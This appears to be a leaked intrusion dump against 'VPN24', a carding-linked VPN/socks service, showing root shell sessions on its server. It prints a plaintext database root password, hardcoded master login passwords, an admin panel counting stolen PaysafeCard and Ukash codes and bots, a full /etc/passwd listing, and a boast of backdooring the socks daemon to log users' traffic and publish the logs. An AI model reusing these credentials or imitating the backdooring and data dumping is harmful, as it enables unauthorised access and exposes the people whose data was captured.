+<tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr> +<tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr> 
+<tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr> +<tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr> +<tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr> +<tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr> 
+<tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr> + +# cat mysql.php +<?php + $server = "localhost"; + $user = "root"; + $pass = "QkZorIZZC5e"; + $database = "vpn24"; + + mysql_connect($server,$user,$pass); + + if(!$install) + mysql_select_db($database); +?> + +# crazy fuckin masterpassword^C +# cat login.php + +<?php + +if(isset($_SESSION['cmuser'])) + echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>"); +else if(isset($_POST['log'])) +{ + $user = mysql_real_escape_string($_POST['user']); + $pass = mysql_real_escape_string($_POST['pass']); + + if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88") + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user'"); + else + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'"); + + $arr = mysql_fetch_array($res); + + if(mysql_num_rows($res) == 0) + die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>"); + + $_SESSION['cmuser'] = $arr['name']; + $_SESSION['cmid'] = $arr['id']; + $_SESSION['cmpass'] = md5($pass); + $_SESSION['pPass'] = $arr['privPass']; + $_SESSION['pUser'] = $arr['privUser']; + $_SESSION['poll'] = $arr['poll']; + echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>"); + +} +else +{ +echo <<< END +<div style=""> +<div style="font-weight:bold;font-size:1.7em;">Login</div> +<table> +<form action="index.php?do=login" method="post"> +<tr> +<td>User:</td><td><input class="cInp" type="text" 
name="user"></td> +</tr> +<tr> +<td>Pass:</td><td><input class="cInp" type="password" name="pass"></td> +</tr> +<br> +</table><br> +<input type="submit" name="log" value="Einloggen"> +</form> +<br><br> +Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a> +</div> +END; + +} +?> + +# tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php +cashIn/eeeeeeeeee.php +cashIn/myOne.php +cashIn/myukashcombine.php +cashIn/oldPSC.php +cashIn/psc.php +cashIn/ukash666.php +cashIn/ukash_convert666.php + +# cd koksundnuTTen88/ && ls -la +total 152 +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 . +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 .. +-rw-r--r-- 1 root root 1112 Nov 7 16:29 add5daysadsdsadsayfdsa.php +-rw-r--r-- 1 root root 511 Nov 13 12:48 asd21938uasd213dsa.php +-rw-r--r-- 1 root root 483 Aug 28 02:27 deletevsdata.php +-rw-r--r-- 1 root root 78 Nov 10 20:19 deletevsdata_noreset.php +-rw-r--r-- 1 root root 508 Aug 28 02:45 getAUserCreditsBack.php +-rw-r--r-- 1 root root 235 Jun 25 2010 getSocksUserWithoutAbo.php +-rw-r--r-- 1 root root 441 Jun 28 2010 getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 14 Jul 10 19:58 index.html +-rw-r--r-- 1 root root 724 Aug 9 17:43 insertShop.php +-rw-r--r-- 1 root root 450 Nov 4 20:29 lu_getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 5255 Nov 9 20:43 psc.php +-rw-r--r-- 1 www-data root 101 May 7 2010 style.css +-rw-r--r-- 1 www-data root 1924 May 7 2010 viewSupport.php +-rw-r--r-- 1 root root 2021 Nov 9 20:42 viewVsocksSupport.php + +# cat psc.php +<?php + + include("../mysql.php"); + + $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." 
Euro</b> in der Datenbank<br>"; + + $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; + + + $res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26"); + $arr = mysql_fetch_array($res); + + echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>"; + + // socksAcces vpnAccess + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0)); + $arr = mysql_fetch_array($res); + echo " <u>Abos:</u> <b>".$arr['ci']."</b> Socks5"; + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0)); + $arr = mysql_fetch_array($res); + echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>"; + + + $res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'"); + $arr = mysql_fetch_array($res); + $gesEarned = $arr['ge']; + $res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedYes = $arr['ge']; + $res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedDBYes = $arr['ge']; + echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." 
/ Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'"); + $arr = mysql_fetch_array($res); + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben "; + + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData"); + $arr = mysql_fetch_array($res); + $fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r"); + $conN = fgets($fp,2048); + fclose($fp); + $fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r"); + $conN2 = fgets($fp,2048); + fclose($fp); + + echo " <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>"; + echo "<br>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'"); + $arr = mysql_fetch_array($res); + + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben "; + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + echo "<b>Noch verfügbar:</b><br>"; + $res = mysql_query("SELECT * FROM shopLayout ORDER BY id"); + + while($arr = mysql_fetch_array($res)) + { + $res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''"); + $res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'"); + echo " <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." 
'".$arr['text']."'<br>"; + } + echo "<br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3"); + $arr = mysql_fetch_array($res); + echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>"; + echo " <u>Stimmen:</u> "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Hun / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Off / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Hun&Off<br>"; + + + +?> + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Was bieten Sie an? | +| Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH | +| Socks und Socks 5 Zugänge in Russland. | +| | +| Wieso kann ich mir so sicher sein dass die Anonymisierung über | +| VPN24 100% logfrei und sicher ist? | +| Wir haben viele Erfahrungen gesammelt da der Service seit | +| 22.12.2009 existiert und er ein offizielles Projekt vom carders.cc| +| Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen| +| wir auch zu 100% sicher sind dass diese nicht mit der Polizei | +| kooperieren (deswegen bieten wir als Location erstmal nur Russland| +| an, weitere Locations werden folgen). Außerdem sind die Server | +| 2-fach verschlüsselt und wie schon erwähnt komplett Logfrei. | +|____________________________________________________________________| + +Alright. So we tapped into your russian VPN- and socksserver and shat +brix when looking at your two-times encrypted server. 
What kind of mad +algorithm from the future are you using? No, lemme guess, AES-0? On +top of that we unfortunately had to reduce the amount of "non-logging" +to about 0% when backdooring your sockd to log http-headers; +strangely, no AES-1337 here either. This gave us a nice round-up of +the people using (and administrating) it and we can't say it was a +surprise. Therefore you find gigabytes of http- and IPlogs neatly +packed and enclosed with the backup. + +# uname -a +Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin +vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false +2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin 
+jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin +sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin +IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin +gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin +BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin +cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin +A49RKGrvdB:x:1021:1021::/home/SSHUSER:/usr/sbin/nologin +3uUk7DToWo:x:1022:1022::/home/SSHUSER:/usr/sbin/nologin +4MMRD3G8gT:x:1025:1025::/home/SSHUSER:/usr/sbin/nologin +QIhyvtXwum:x:1026:1026::/home/SSHUSER:/usr/sbin/nologin +bX8CG70Z8o:x:1027:1027::/home/SSHUSER:/usr/sbin/nologin +NGHZWVpVuu:x:1028:1028::/home/SSHUSER:/usr/sbin/nologin +MkdEe0NgXc:x:1029:1029::/home/SSHUSER:/usr/sbin/nologin +VP3ofYe5qa:x:1033:1033::/home/SSHUSER:/usr/sbin/nologin +s9wnq4iJbL:x:1035:1035::/home/SSHUSER:/usr/sbin/nologin +JF23IDOEX0:x:1037:1037::/home/SSHUSER:/usr/sbin/nologin +GOE9IvxCo8:x:1038:1038::/home/SSHUSER:/usr/sbin/nologin +2mAWybIfou:x:1039:1039::/home/SSHUSER:/usr/sbin/nologin +ywLRB9sQG5:x:1040:1040::/home/SSHUSER:/usr/sbin/nologin +U5wILkFczX:x:1043:1043::/home/SSHUSER:/usr/sbin/nologin +qU247MmWWp:x:1045:1045::/home/SSHUSER:/usr/sbin/nologin +JpE3P8WgBN:x:1047:1047::/home/SSHUSER:/usr/sbin/nologin +OTx2pkLemc:x:1048:1048::/home/SSHUSER:/usr/sbin/nologin +tLDp1920ug:x:1049:1049::/home/SSHUSER:/usr/sbin/nologin +pzSoTppzAu:x:1052:1052::/home/SSHUSER:/usr/sbin/nologin +fcz40nnjZr:x:1053:1053::/home/SSHUSER:/usr/sbin/nologin +1TEkAllzys:x:1054:1054::/home/SSHUSER:/usr/sbin/nologin +WMfvkEivY0:x:1055:1055::/home/SSHUSER:/usr/sbin/nologin +4Vvq0LAF9r:x:1059:1059::/home/SSHUSER:/usr/sbin/nologin +QVMgMXxSeK:x:1060:1060::/home/SSHUSER:/usr/sbin/nologin +dtxSHwZpH3:x:1061:1061::/home/SSHUSER:/usr/sbin/nologin +Uth54wPUPD:x:1062:1062::/home/SSHUSER:/usr/sbin/nologin +eCWEZEQZVq:x:1064:1064::/home/SSHUSER:/usr/sbin/nologin +wp6WkrrhkH:x:1065:1065::/home/SSHUSER:/usr/sbin/nologin +QLGAfXHUAX:x:1069:1069::/home/SSHUSER:/usr/sbin/nologin 
+NWPWWWxBnh:x:1070:1070::/home/SSHUSER:/usr/sbin/nologin +LY5yDIThxj:x:1071:1071::/home/SSHUSER:/usr/sbin/nologin +LvJSd7KRCq:x:1072:1072::/home/SSHUSER:/usr/sbin/nologin +DNlBW8cww2:x:1074:1074::/home/SSHUSER:/usr/sbin/nologin +22JAEReAWb:x:1075:1075::/home/SSHUSER:/usr/sbin/nologin +1U7iYfKkZg:x:1076:1076::/home/SSHUSER:/usr/sbin/nologin +A9RlGkkBly:x:1078:1078::/home/SSHUSER:/usr/sbin/nologin +ezjCz5tTLo:x:1080:1080::/home/SSHUSER:/usr/sbin/nologin +CZ298VrwyT:x:1084:1084::/home/SSHUSER:/usr/sbin/nologin +DDFFWPh13H:x:1085:1085::/home/SSHUSER:/usr/sbin/nologin +FwKPqLl9HO:x:1086:1086::/home/SSHUSER:/usr/sbin/nologin +4GA5FfwFEB:x:1090:1090::/home/SSHUSER:/usr/sbin/nologin +6RyUaunr8w:x:1091:1091::/home/SSHUSER:/usr/sbin/nologin +O2cPtoYJSA:x:1092:1092::/home/SSHUSER:/usr/sbin/nologin +OieOTeMsVT:x:1093:1093::/home/SSHUSER:/usr/sbin/nologin +nqh2PPsJoX:x:1094:1094::/home/SSHUSER:/usr/sbin/nologin +vLymjSZ2PC:x:1096:1096::/home/SSHUSER:/usr/sbin/nologin +BB22Ob0wRq:x:1097:1097::/home/SSHUSER:/usr/sbin/nologin +osHYLha9Xa:x:1100:1100::/home/SSHUSER:/usr/sbin/nologin +Mjs6t1fh7r:x:1102:1102::/home/SSHUSER:/usr/sbin/nologin +DEZtQQ9XlX:x:1104:1104::/home/SSHUSER:/usr/sbin/nologin +GIVQTfHrFc:x:1106:1106::/home/SSHUSER:/usr/sbin/nologin +6keWEVe8CF:x:1107:1107::/home/SSHUSER:/usr/sbin/nologin +f4rKlco33u:x:1109:1109::/home/SSHUSER:/usr/sbin/nologin +7iVUdiWpZI:x:1110:1110::/home/SSHUSER:/usr/sbin/nologin +WBuxr9t5xJ:x:1111:1111::/home/SSHUSER:/usr/sbin/nologin +9q9ZUnLTQd:x:1114:1114::/home/SSHUSER:/usr/sbin/nologin +Aw1GQfhx6F:x:1116:1116::/home/SSHUSER:/usr/sbin/nologin +uurtXDhjEU:x:1117:1117::/home/SSHUSER:/usr/sbin/nologin +G7lfd8zf1h:x:1119:1119::/home/SSHUSER:/usr/sbin/nologin +EMY6T7qTGu:x:1120:1120::/home/SSHUSER:/usr/sbin/nologin +IzPTVGc4Yo:x:1123:1123::/home/SSHUSER:/usr/sbin/nologin +4RmVWo7T4v:x:1126:1126::/home/SSHUSER:/usr/sbin/nologin +z9VTnI5JJX:x:1127:1127::/home/SSHUSER:/usr/sbin/nologin +qF7C1TR0he:x:1128:1128::/home/SSHUSER:/usr/sbin/nologin 
+OxUqFE7v5H:x:1130:1130::/home/SSHUSER:/usr/sbin/nologin +QluTWIEQSG:x:1131:1131::/home/SSHUSER:/usr/sbin/nologin +APi3yQS9Dt:x:1136:1136::/home/SSHUSER:/usr/sbin/nologin +KscYKlIxxP:x:1137:1137::/home/SSHUSER:/usr/sbin/nologin +4OrVVMvg5b:x:1138:1138::/home/SSHUSER:/usr/sbin/nologin +9q9wWck1iv:x:1139:1139::/home/SSHUSER:/usr/sbin/nologin +7T3MmDDuYA:x:1140:1140::/home/SSHUSER:/usr/sbin/nologin +9i3rSA1t3B:x:1141:1141::/home/SSHUSER:/usr/sbin/nologin +OG60AiIy32:x:1142:1142::/home/SSHUSER:/usr/sbin/nologin +XQlGb5EDEX:x:1143:1143::/home/SSHUSER:/usr/sbin/nologin +gSPbDrdVM7:x:1146:1146::/home/SSHUSER:/usr/sbin/nologin +bn1XjaAbBO:x:1148:1148::/home/SSHUSER:/usr/sbin/nologin +eEAGLP58B1:x:1149:1149::/home/SSHUSER:/usr/sbin/nologin +19vuUOl1DA:x:1151:1151::/home/SSHUSER:/usr/sbin/nologin +GJTBqAX0Po:x:1153:1153::/home/SSHUSER:/usr/sbin/nologin +YlKhbzOzlW:x:1155:1155::/home/SSHUSER:/usr/sbin/nologin +P1IEuRFxoc:x:1157:1157::/home/SSHUSER:/usr/sbin/nologin +M74tz0c6cB:x:1159:1159::/home/SSHUSER:/usr/sbin/nologin +pxCR5mWYxl:x:1160:1160::/home/SSHUSER:/usr/sbin/nologin +BYBEFkGPOv:x:1161:1161::/home/SSHUSER:/usr/sbin/nologin +bLQLndsfG7:x:1162:1162::/home/SSHUSER:/usr/sbin/nologin +7RsRZ2UUu4:x:1163:1163::/home/SSHUSER:/usr/sbin/nologin +gbWPMY3QUz:x:1164:1164::/home/SSHUSER:/usr/sbin/nologin +3DPSaYAK0I:x:1165:1165::/home/SSHUSER:/usr/sbin/nologin +Mfa9YHsFwm:x:1167:1167::/home/SSHUSER:/usr/sbin/nologin +MCdvro0waF:x:1168:1168::/home/SSHUSER:/usr/sbin/nologin +4qTipZxa3g:x:1169:1169::/home/SSHUSER:/usr/sbin/nologin +jzJtLApQhG:x:1174:1174::/home/SSHUSER:/usr/sbin/nologin +MfJ1grnWz2:x:1176:1176::/home/SSHUSER:/usr/sbin/nologin +TKTlaudWc6:x:1178:1178::/home/SSHUSER:/usr/sbin/nologin +Pg6UVUT4Zi:x:1179:1179::/home/SSHUSER:/usr/sbin/nologin +7KxfsATvUY:x:1180:1180::/home/SSHUSER:/usr/sbin/nologin +1YzAOqKyJU:x:1181:1181::/home/SSHUSER:/usr/sbin/nologin +ArAdFXiTdV:x:1182:1182::/home/SSHUSER:/usr/sbin/nologin +Tyt6Mxbjb9:x:1183:1183::/home/SSHUSER:/usr/sbin/nologin 
+p5TdBxcMOd:x:1185:1185::/home/SSHUSER:/usr/sbin/nologin +HCj78QJ6bB:x:1186:1186::/home/SSHUSER:/usr/sbin/nologin +ataiqUNkhi:x:1187:1187::/home/SSHUSER:/usr/sbin/nologin +BDnc11BaRR:x:1189:1189::/home/SSHUSER:/usr/sbin/nologin +0xs05pGnsc:x:1192:1192::/home/SSHUSER:/usr/sbin/nologin +6lCpT6Rtlb:x:1193:1193::/home/SSHUSER:/usr/sbin/nologin +MZGuvPmcQQ:x:1194:1194::/home/SSHUSER:/usr/sbin/nologin +S393KhVsS0:x:1195:1195::/home/SSHUSER:/usr/sbin/nologin +hePPBhA3Zb:x:1196:1196::/home/SSHUSER:/usr/sbin/nologin +xU33BmPZBt:x:1198:1198::/home/SSHUSER:/usr/sbin/nologin +8kTCqMWNer:x:1199:1199::/home/SSHUSER:/usr/sbin/nologin +Z9mwX94DwA:x:1203:1203::/home/SSHUSER:/usr/sbin/nologin +QE70dT7Sk6:x:1207:1207::/home/SSHUSER:/usr/sbin/nologin +3nRGuwyy3O:x:1208:1208::/home/SSHUSER:/usr/sbin/nologin +7lHu9x5ahz:x:1209:1209::/home/SSHUSER:/usr/sbin/nologin +yQt4twcYHi:x:1210:1210::/home/SSHUSER:/usr/sbin/nologin +5QOvATUZRp:x:1211:1211::/home/SSHUSER:/usr/sbin/nologin +qrIJmTNsip:x:1213:1213::/home/SSHUSER:/usr/sbin/nologin +3MD6MyTcBm:x:1214:1214::/home/SSHUSER:/usr/sbin/nologin +tX55vN8iBA:x:1216:1216::/home/SSHUSER:/usr/sbin/nologin +MUF31iM1WD:x:1218:1218::/home/SSHUSER:/usr/sbin/nologin +6I1FTys1aV:x:1219:1219::/home/SSHUSER:/usr/sbin/nologin +wH5nC1icK0:x:1222:1222::/home/SSHUSER:/usr/sbin/nologin +z9GYUjVR9T:x:1224:1224::/home/SSHUSER:/usr/sbin/nologin +uiv8RD7GCm:x:1225:1225::/home/SSHUSER:/usr/sbin/nologin +debug:x:1227:1227::/home/SSHUSER:/usr/sbin/nologin +udewQStk6R:x:1229:1229::/home/SSHUSER:/usr/sbin/nologin +YRfpne3P1W:x:1231:1231::/home/SSHUSER:/usr/sbin/nologin +2G6ixqigXX:x:1232:1232::/home/SSHUSER:/usr/sbin/nologin +FZ6nGPBlnq:x:1234:1234::/home/SSHUSER:/usr/sbin/nologin +N4WUxGoeHX:x:1235:1235::/home/SSHUSER:/usr/sbin/nologin +3qoY48h6od:x:1236:1236::/home/SSHUSER:/usr/sbin/nologin +0KltTgDdxs:x:1237:1237::/home/SSHUSER:/usr/sbin/nologin +KnOIZkAYhv:x:1239:1239::/home/SSHUSER:/usr/sbin/nologin +pduruQrvQw:x:1240:1240::/home/SSHUSER:/usr/sbin/nologin 
+gfPh6U7BSL:x:1244:1244::/home/SSHUSER:/usr/sbin/nologin +5d4PClWw9W:x:1246:1246::/home/SSHUSER:/usr/sbin/nologin +X3IwwuMhVn:x:1247:1247::/home/SSHUSER:/usr/sbin/nologin +9lKRF8UVul:x:1250:1250::/home/SSHUSER:/usr/sbin/nologin +7OEkZFXfrj:x:1251:1251::/home/SSHUSER:/usr/sbin/nologin +XR9kXMus18:x:1252:1252::/home/SSHUSER:/usr/sbin/nologin +LeJdtNDj0s:x:1253:1253::/home/SSHUSER:/usr/sbin/nologin +sMdDwKbykL:x:1255:1255::/home/SSHUSER:/usr/sbin/nologin +RLPQ9lCkkg:x:1257:1257::/home/SSHUSER:/usr/sbin/nologin +m07JSN8S1t:x:1258:1258::/home/SSHUSER:/usr/sbin/nologin +KoW5ucmliR:x:1259:1259::/home/SSHUSER:/usr/sbin/nologin +vxaNuWuV5A:x:1260:1260::/home/SSHUSER:/usr/sbin/nologin +r6cQANOWcM:x:1261:1261::/home/SSHUSER:/usr/sbin/nologin +GefhxHzMLB:x:1264:1264::/home/SSHUSER:/usr/sbin/nologin +gghzgxMlzK:x:1265:1265::/home/SSHUSER:/usr/sbin/nologin +dTECuvvcnY:x:1267:1267::/home/SSHUSER:/usr/sbin/nologin +teamsocks:x:1268:1268::/home/SSHUSER:/usr/sbin/nologin +2ZzW1TPwek:x:1273:1273::/home/SSHUSER:/usr/sbin/nologin +98pASZD7ZL:x:1274:1274::/home/SSHUSER:/usr/sbin/nologin +rgNCfMxMDE:x:1276:1276::/home/SSHUSER:/usr/sbin/nologin +TPJNO6U7gB:x:1278:1278::/home/SSHUSER:/usr/sbin/nologin +ZfQAMBcfd9:x:1280:1280::/home/SSHUSER:/usr/sbin/nologin +DWJLuNgRHq:x:1281:1281::/home/SSHUSER:/usr/sbin/nologin +26PWTAtsMQ:x:1282:1282::/home/SSHUSER:/usr/sbin/nologin +wiDxLyK5di:x:1283:1283::/home/SSHUSER:/usr/sbin/nologin +OOueJqB7Ux:x:1285:1285::/home/SSHUSER:/usr/sbin/nologin +EaDZkcpMhf:x:1286:1286::/home/SSHUSER:/usr/sbin/nologin +swj3AHcyct:x:1287:1287::/home/SSHUSER:/usr/sbin/nologin +tf1x5jgZf7:x:1289:1289::/home/SSHUSER:/usr/sbin/nologin +fTkJjFodJR:x:1290:1290::/home/SSHUSER:/usr/sbin/nologin +q8Ospeoqjm:x:1292:1292::/home/SSHUSER:/usr/sbin/nologin +atIdo8CMgl:x:1293:1293::/home/SSHUSER:/usr/sbin/nologin +AIVtIPpwbI:x:1294:1294::/home/SSHUSER:/usr/sbin/nologin +83ssqOi2mG:x:1295:1295::/home/SSHUSER:/usr/sbin/nologin +mDhIWzTPpL:x:1297:1297::/home/SSHUSER:/usr/sbin/nologin 
